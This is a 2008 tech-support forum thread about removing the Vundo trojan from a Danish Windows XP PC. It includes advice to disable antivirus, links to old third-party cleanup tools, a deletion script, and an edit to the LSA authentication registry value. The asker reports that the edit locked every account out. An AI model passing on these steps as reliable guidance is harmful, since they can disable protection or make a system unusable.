Thousands of free tech tips, tricks, how-to’s and tutorials are available in our peer reviewed articles section. See for yourself how smart our experts are, no login required.

Screenshot of an Article

Working on a long term project?

Store your work and research.

Save solutions to your questions, answers you’ve discovered through searching plus helpful articles in your personal knowledgebase for easy future access.

Screenshot of Experts Exchange Knowledgebase

Access the answers to your technology questions today.

Subscribe Now

30-day free trial. Register in 60 seconds.

What Makes Experts Exchange Unique?

Members of the expert community talk about why the experience at Experts Exchange is different than what you will find anywhere else.

Trusted by the world's most respected brands.

image of each brand's logo

Faithfully serving IT professionals since 1996.

Experts Exchange Logo

Try it out and discover for yourself.

Subscribe Now

30-day free trial. Register in 60 seconds.

Related Solutions

  1. HijackThis log help
    Hi experts, Kinda need a solution to this asap: below is a log from a HijackThis scan. The major problem I am having is when I access the Internet, and say a search engine page to look for sites with keywords, I seem to get either Casino sites, or other seach sites (eg netste...
  2. Hijackthis Log
    Ok I scanned my computer with hijack this here is the log: I get popups like crazy on this computer!!!! What needs deleted? Logfile of HijackThis v1.99.1 Scan saved at 3:08:23 AM, on 8/30/2007 Platform: Windows XP SP2 (WinNT 5.01.2600) MSIE: Internet Explorer v6.00 SP2 (6....
  3. malware
    When opeining IE browser, i keep getting little boxes in different parts of the web page say "page cannot be displayed. i noticed that the little boxes are linked to http://eee.jopenqc.com. I can't get rid of the boxes...please help...i ran spyware and malware detector ...

Free Tech Articles

  1. WARNING: 5 Reasons why you should NEVER fix a computer for free.
    It is in our nature to love the puzzle. We are obsessed. The lot of us. We love puzzles. We love the challenge. We thrive on finding the answer. We hate disarray. It bothers us deep in our soul. W...
  2. SCCM OSD Basic troubleshooting
    SCCM 2007 OSD is a fantastic way to deploy operating systems, however, like most things SCCM issues can sometimes be difficult to resolve due to the sheer volume of logs to sift through and the dispe...
  3. Migrate Small Business Server 2003 to Exchange 2010 and Windows 2008 R2
    This guide is intended to provide step by step instructions on how to migrate from Small Business Server 2003 to Windows 2008 R2 with Exchange 2010. For this migration to work you will need the fo...
  4. Create a Win7 Gadget
    This article shows you how to create a simple "Gadget" -- a sort of mini-application supported by Windows 7 and Vista. Gadgets can be dropped anywhere on the desktop to provide instant information, ...
  5. Outlook continually prompting for username and password
    There have been a lot of questions recently regarding Outlook prompting for a username and password whilst using Exchange 2007. There are a few reasons why this would happen and I will try to cover t...
  6. Backup Exchange 2010 Information Store using Windows Backup
    There seems to be quite a lot of confusion around the ability to backup Exchange 2010 using the built in Windows Backup feature. This stems from the omission of this feature prior to Exchange 2007 s...

Cloud Class Webinars

  1. Avoiding Bugs in Microsoft Access
    Alison Balter takes and in-depth look at avoiding bugs in Access. In this webinar you will learn about using the immediate window to debug your applications, invoking the debugger, using breakpoints to troubleshoot, stepping through code, setting the next statement to execute, ...
  2. Top 10 Best New Features in Visio 2010
    Scott Helmers gives live demonstrations of the top 10 new features in Visio 2010. This webinar will teach you how to create compelling diagrams by adding shapes to the page with a single click, linking the shapes in a diagram to data in Excel (or SQL Server, or SharePoint), ...
  3. IT Consultant Business Secrets Revealed
    Michael Munger, Experts Exchange tech pro and IT consultant, pulls back the curtain on his very successful businesses and answers question on every IT consultant and business owner should know about. He shares secrets on what he did to solve the 5 most common problems in IT, ...
  4. Disaster Recovery and Business Continuity
    Quest CTO, Mike Billon, gives an overview of the steps involved in building a dunamic disaster recovery plan. Through case studies and an examination of software/hardware tooles for monitoring and testing, you'll gain a better understandin of where you are, where you want ...
  5. Organize Your Visio Diagrams with Containers and Lists
    Scott Helmers uses cross functional flowcharts, wireframe diagrams, data graphic legends and seating charts to teach you: how to ustilize all three new structured diagram components in Visio 2010, the best practices for organizeing shapes in previous version of Visio, how to organize ...
  6. How to Us Objects, Properties, Events and Methods in Microsoft Access
    Alison Dalter gives an in-depbth look at objects, properties, events and methods in Microsoft Access. In this webinar you will learn about using the object browser, referring to objects, working with properties and methods, working with object variables, understanding the ...

Join the Community

Give a Little. Get a Lot.

Join the community of experts here and help other tech pros by answering question in your area of expertise. You can earn FREE access to all Experts Exchange's premium features and resources.

Join the Community

Answers

 

by: rhythmluvrPosted on 2008-01-27 at 13:37:47ID: 20755344

Avast AntiVirus Home Edition (Free) has a great feature, during the install it will ask whether you would like to perform a pre-boot scan of your system. During the next reboot it will scan your system before it fully loads the operating system, I have used this to get rid of stubborn malware that other programs will not remove. I have installed this program with other AntiVirus on the system already, it will warn you that it found another AV program but once the pre-scan has been performed you can remove it.

It is the only software I have seen with this feature.

 

by: IndiGenusPosted on 2008-01-27 at 13:49:31ID: 20755379

Certainly looks like Vundo/Conhook Trojan to me...

Download and Run ComboFix (by sUBs)

http://download.bleepingcomputer.com/sUBs/ComboFix.exe

Disable your Anti-virus and any real-time Anti-spyware monitors that are running.
Then double click Combofix.exe & follow the prompts.
When finished, it will produce a log for you. Upload that log in your next reply with a new HijackThis log.  

Please do not post the log into the comment window. Use "Attach File" under the comment window to post the log.

Note 1: Do not mouseclick combofix's window while it's running. That may cause it to stall.
Note 2: Remember to re-enable your Anti-virus and Anti-spyware.

NOTE: If you have issues connecting to your network or internet after running combofix you can either simply reboot, or do the following:
* Going to Control Panel > Network Connections.
* Right click on their Network icons & select "Repair"
or
Alternately, if the Network icon appears in the notification area in the lower right corner of Desktop, right-click it, and then click Repair from the shortcut menu.

PLEASE ALSO NOTE: Combofix will typically fix most and sometimes all Malware entries but many times a script is also needed to finish cleaning up. So please keep CF until advised whether you need the script or not.

 

by: chilternPCPosted on 2008-01-27 at 15:27:40ID: 20755752

one you have clear this problem ( I use spybot myself from here :
http://www.safer-networking.org/en/index.html ) and the free windows defender from microsnot

to stop persistent malware - do not let teenagers use the PC - do not click on links in email - do not visit dodgy sites (thoses inticing adverts or pops ups - alway click the red cross) . - do not use p2p software such as limewire, bit torrent,bear share,
do not click on links in  msn messenger

 

by: rpggamergirlPosted on 2008-01-27 at 15:33:32ID: 20755771

The absence of the 02 and 020 lines in Hijackthis is the sign of vundo/conhook infection so I agree with InDiGenus that running Combofix is a good idea and anyway bad files showing in the log can be removed using its CFScript function.

The IP address that's showing there looks very much like a wareout infection and also the symptom you mentioned, so I think it could also a wareout infection.

Try running Fixwareout also.
Please download FixWareout from one of these sites:
http://downloads.subratam.org/Fixwareout.exe
http://download.bleepingcomputer.com/lonny/Fixwareout.exe

Save it to your desktop and run it. Click Next, then Install, then make sure "Run fixit" is checked and click Finish. The fix will begin; follow the prompts. You will be asked to reboot your computer; please do so. Your system may take longer than usual to load; this is normal.

At the end of the fix, you may need to restart your computer again.

 

by: orangutangPosted on 2008-01-27 at 15:42:03ID: 20755800

Also, SUPERAntiSpyware (http://www.superantispyware.com/downloadfile.html?productid=SUPERANTISPYWAREFREE) and remove:
O4 - HKLM\..\Run: [BM870dc8a8] Rundll32.exe "C:\WINDOWS\system32\sslnpilc.dll",s

 

by: steve0412Posted on 2008-01-28 at 02:34:11ID: 20757990

I have come to this conclusion, after I discovered a Zatacka icon on the desktop of a user:

Zatacka is a popular arcade-type game. It is available on download from reliable sources such as sourceforge (http://zatacka.sourceforge.net/index.php?id=authors).

My 15-year old daughter enjoys this game, but one day she wanted to play it on another PC here, so she downloaded it, from an unreliable source it seems. Zatacka.exe was a 46kb exe file that installed to the desktop. After she found that nothing happened when she tried to start it, she tried to remove it-she could not.

At about the same time, we started to get a lot of pop-ups from partypoker, statcounter, tradedoubler, 2o7, Clickxchange, Linksynergy, advanced, bizadverts, dk.advancedcleaner, secure.advancedcleaner and zedo. At the same time it seems, the trojan, vundo was installed.

The mechanism seems to be that an XML file, BM870dc8a8, is installed in the Windows directory and run on starting a browser. This came to our attention when web pages stopped loading completely. This XML file calls rundll32.exe, which runs dll's installed in the system32 (names such as 'djshrhsg.dll'.

If you use Hijackthis, or startup monitor to remove the command from the HKLM run section, it immediately clones itself.

The way to remove it is to start Windows in safe mode with command prompt and use the 'DEL' command.

McAfee Security Suite, SpyHunter 3, Spy Eraser or RogueRemover pro did not detect this problem.

Has anyone heard of this before, and do you think I have nailed the problem?

 

by: chilternPCPosted on 2008-01-28 at 02:39:23ID: 20758015

best way to 'nail the problem' for the future  is 'limited or No accounts for children!! (or even better their own PCs)  :-)

 

by: IndiGenusPosted on 2008-01-28 at 03:36:31ID: 20758219

Yes we have heard of it. It is Vundo/Conhook Trojan and is very (unfortunately) common these days. Combofix and typically a follow up script with it deals with it very nicely. There is even a new variant that infects .exe files, causing start up programs to fail. CF would have also dealt with this nicely.

Dave

 

by: steve0412Posted on 2008-01-28 at 03:36:48ID: 20758221

Ralph Nader once wrote a book "Unsafe at Any Speed:The Designed-In Dangers of the American Automobile". There should be one called "Unsafe at Any Speed :The Designed-In Dangers of the Internet".

 

by: IndiGenusPosted on 2008-01-28 at 03:38:12ID: 20758226

Sorry forgot to mention...no way for us to know if you solved the problem. Have the issues disappeared?

 

by: steve0412Posted on 2008-01-28 at 04:33:51ID: 20758403

The problem is solved, but I figure that I got there myself. However, I am grateful for the good advice, so I will split the points

 

by: steve0412Posted on 2008-01-28 at 05:24:52ID: 20758629

I spoke too soon.Opened another user profile and bang! There it is again. I am running combo fix now, but am worried by a instruction conflict  in swreg.cfexe. I have clicked thru and CF is scanning

 

by: steve0412Posted on 2008-01-28 at 05:39:08ID: 20758726

Please see log and comment?

 

by: IndiGenusPosted on 2008-01-28 at 07:49:38ID: 20760040

Heavily infected machine...had a "feeling" you would be back, or have to make another post. Give me a little and I'll put a CFScript together for you if you like.

 

by: IndiGenusPosted on 2008-01-28 at 08:29:49ID: 20760504

1. Open Notepad.

2. Now copy/paste the text between the lines below into the Notepad window:

---------------------------------------------------------------------------------------------------------------

File::
C:\WINDOWS\system32\bxxogiao.pest
C:\WINDOWS\system32\sslnpilc.pest
C:\WINDOWS\system32\qcsqhaif.pest
C:\WINDOWS\BM870dc8a8.xml
C:\WINDOWS\system32\djjhkdec.pest
C:\WINDOWS\system32\tryjvick.pest
C:\WINDOWS\BM870dc8a8crap2.xml
C:\WINDOWS\system32\lhpyevon.pest
C:\WINDOWS\system32\wecswpwi.pst
C:\WINDOWS\system32\fqrhbddy.pest
C:\WINDOWS\system32\tynlomju.pest
C:\WINDOWS\BM870dc8a8crap.xml
C:\WINDOWS\system32\adubyivx.pest
C:\WINDOWS\system32\ivlrtwlu.pest
C:\WINDOWS\system32\eqqgqcix.pest
C:\WINDOWS\system32\gocjemjp.pest
C:\WINDOWS\system32\gntwwwhr.pest
C:\WINDOWS\system32\pacrbsma.pest
C:\WINDOWS\system32\lfweeymi.pest
C:\WINDOWS\system32\dsfkbpgr.pest
C:\WINDOWS\system32\icxujaoj.pest
C:\WINDOWS\system32\kaprwtgk.pest
C:\WINDOWS\system32\pgtxwmij.pest
C:\WINDOWS\system32\iikfvcsp.pest
C:\WINDOWS\system32\hesrnwym.pest
C:\WINDOWS\system32\lljrmkln.pest      
C:\WINDOWS\system32\nomnvppa.pest
C:\WINDOWS\system32\jbbmbeig.pest
C:\WINDOWS\system32\ncprincn.pest
C:\WINDOWS\system32\eocymiir.pest
C:\WINDOWS\system32\ffmhrwss.pest
C:\WINDOWS\system32\qjitcugg.pest
C:\WINDOWS\system32\sardsvqh.pest
C:\WINDOWS\system32\iifggff.dll
C:\WINDOWS\system32\mljgh.dll

Registry::
[-HKEY_LOCAL_MACHINE\software\microsoft\windows nt\currentversion\winlogon\notify\iifggff]
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa]
"Authentication Packages"=hex(7):6d,73,76,31,5f,30,00,00

---------------------------------------------------------------------------------------------------------------

3. Save the above as CFScript.txt on your desktop.

4. Then drag the CFScript.txt into ComboFix.exe. This will start ComboFix again.

5. After reboot, (in case it asks to reboot), please upload the following reports/logs.

-Combofix.txt
-A new HijackThis log ~ From each user account

 

by: steve0412Posted on 2008-01-28 at 12:23:33ID: 20762498

Before I do that, please be aware that these files have been renamed by me. They were .dll files. Shall I perform the task anyway or should I rename them back to .dll?

 

by: steve0412Posted on 2008-01-28 at 12:24:42ID: 20762506

actually, it is self-explanatory, so I will perform the task 'as is'

 

by: IndiGenusPosted on 2008-01-28 at 13:02:46ID: 20762861

Yes just to confirm "as is". They are all Vundo files. I thought one of the security programs you tried may have renamed them but the extension did look a little funny...

 

by: steve0412Posted on 2008-01-28 at 14:33:20ID: 20763608

Hi

I followed instructions but nothing happened, so I tried to run combofix and copy the CFScript.txt to the blue window. It has not removed the files. I am includingthe log, script and 5 hijackthis log files.

NB. I had ms Process Explorer installed on this PC. Has combofix removed it?

 

by: steve0412Posted on 2008-01-28 at 14:49:12ID: 20763757

Just a comment (not really to do with the problem in hand, but anyway)
Considering that we are talking about removing pests, it amazes me that by opening experts-exchange, adware pests namely adtech, tribalfusion and e2.emediate cookies are placed on my PC!

 

by: IndiGenusPosted on 2008-01-28 at 15:08:38ID: 20763908

The script didn't run because you are not running combofix from the desktop. Combofix needs to be put directly on the desktop. Do the same with the script .txt file. Then drag the txt file onto CF... that should do it. Then post the logs...

 

by: steve0412Posted on 2008-01-28 at 15:18:58ID: 20763975

Combofix is on the desktop, not a shortcut, but where it was installed. If I drag the file in (also on the desktop) , the loading bar starts, a flash of blue screen then nothing (how long do I wait? 20 minutes?)

 

by: rpggamergirlPosted on 2008-01-28 at 16:13:12ID: 20764274

Combofix instructions says to run it from the desktop maybe because that's easier, but even IF it wasn't, the CFScript still should work as long is it's in the same location as Combofix.exe, Just wait and let it run even for 20 minutes.


>>>Considering that we are talking about removing pests, it amazes me that by opening experts-exchange, adware pests namely adtech, tribalfusion and e2.emediate cookies are placed on my PC!<<<

Tribal Fusion feeds the advertising for EE, and of course EE gets paid for the displaying these ads on their pages, but Premium members don't have these ads.

 

by: IndiGenusPosted on 2008-01-28 at 16:53:48ID: 20764512

Forgive my ignorance on this...

This is where cf is located:

C:\Documents and Settings\Anne\Skrivebord\ComboFix.exe

What is Skrivebord? Is it another language for desktop?

 

by: rpggamergirlPosted on 2008-01-28 at 18:04:32ID: 20764894

I think Norwegian windows XP Desktop is called --> Skrivebord , :)

And "Escritorio" in Spanish
C:\Documents and Settings\Owner\Escritorio\ComboFix.exe

 

by: IndiGenusPosted on 2008-01-28 at 18:16:34ID: 20764944

From your HijackThis logs...this is the only entry I'm seeing as bad. Looks like it's at least partly fixed. You can have Hijackthis fix the item.

O20 - Winlogon Notify: iifggff - iifggff.dll (file missing)

See if that helps.

 

by: steve0412Posted on 2008-01-29 at 03:28:05ID: 20766859

No Luck wuth dropping the script file on the icon. It starts, but no log is produced, and the files are still there. Can I remove the files manually?

 

by: IndiGenusPosted on 2008-01-29 at 06:37:15ID: 20768046

Yes, you can remove the files manually, but there is one registry entry that still is bad.

This, which is bad...
[HKEY_LOCAL_MACHINE\system\currentcontrolset\control\lsa]
Authentication Packages      REG_MULTI_SZ         msv1_0 C:\WINDOWS\system32\mljgh.dll

Should be this..
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa]
"Authentication Packages"=hex(7):6d,73,76,31,5f,30,00,00

If you are comfortable editing the registry you can do it manually.

 

by: steve0412Posted on 2008-01-29 at 07:47:13ID: 20768802

no, I wouldn't know unless it is to replace the current text with the string provided, but I am sure it is not. Is it still a REG_MULTI_SZ? or do I enter the string in binary? Sorry about the lack of knowledge in this department, but I don't want to screw the registry up!!!

 

by: IndiGenusPosted on 2008-01-29 at 10:44:31ID: 20770747

First you should back up your registry, especially if you're not comfortable with editing it.

You are going to go to the HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa key.
When you navigate to "Authentication Packages" under the name heading in your registry, it will be:

Type: REG_MULTI_SZ
Data: msv1_0

 

by: steve0412Posted on 2008-01-30 at 01:25:43ID: 20775728

Ok, is this a bad joke?

I did as instructed and now Windows is asking me for a log in password for all the accounts on that PC. As no password was set, I am at a loss what to do. I have tried 'administrator' with no avail.

Please advise.

 

by: steve0412Posted on 2008-01-30 at 01:38:51ID: 20775782

OK, I have recovered the system from the 'last known good etc..'.That was one helluva change in the registry! Now, what do I have to do to the user accounts to make the registry change and not have the same pronlem of totally locked down accounts?

 

by: IndiGenusPosted on 2008-01-30 at 05:34:13ID: 20776819

OK? I'm confused on several things here.

1. You are saying that last registry change made this happen?
2. Did you make a backup of the registry before doing the change as I had advised? If so you could have just reverted to that.

That change if done properly should not have caused that to happen and I'm not sure what's going on here.

If you went to Last Known Good Configuration then it should have just brought you back to where you were before.

Is this an english version of XP, or another language? I had commented about the Skriveboard (Desktop) earlier. I'm wondering if that had something to do with it.  

 

by: steve0412Posted on 2008-01-30 at 10:57:16ID: 20779891

1, Yes, because the only thing changed in the registry was changing the entry as proposed.

2. Yes, I did, and that is why I could recover.

This is Danish XP. When I tried to log on, including the administrator account in Safe mode, it said that I had limited permission. Since I don't run with passwords on that PC (yes - I know -stupid!) there were no passwords to enter. I tried 'admin, administrator, password.

 

by: IndiGenusPosted on 2008-01-30 at 11:12:46ID: 20780068

I cannot say for sure but since this pc is Danish maybe the reg entry would be different??? I obviously really only deal with US, as you can tell by the fact that I didn't know what "skriveboard" meant.

Maybe rpg will look in here with a suggestion.

 

by: steve0412Posted on 2008-02-01 at 01:07:20ID: 31425501

There is still the point of the change in the registry, which blocked access to the user accounts. This may be an issue with language versions (Danish) of Windows XP. I would like to know that I have fully removed the threat and that I am protected in the future.

20120131-EE-VQP-002

3 Ways to Join

30-Day Free Trial

The Experts

98% positive feedback on 31,087 answers since March 2000. angeliii is a Microsoft Most Valuable Professional for his work with MS SQL Server & Develoment.

He has also proven his knowledge of Visual Basic Programming, PHP Scripting and Oracle Databases.

The Experts

97% positive feedback on 10,752 answers since July 2000. lrmoore has more than 18 years experience in the networking industry.

The six-time Mircosoft MVPs specialties include firewalls, virtual private networking, and network management.

Testimonials

"...and excellent source for support... Kind of like having your very own IT dept." Electriciansnet

Testimonials

"I was apprehensive at signing up at first. However... it has already made my life as an IT administrator much easier." JaCrews

Testimonials

"WOW! You guys have great, active, and knowledgeable people on here." moore50

Business Clients

Business Clients

In the Press

"If you’ve got a question... Experts Exchange can supply an answer.”

In the Press

"...an invaluable aid for both IT professionals and those who require tech support."

In the Press

"where IT professionals provide quick answers on just about any topic"

Business Account Plans

Loading Advertisement...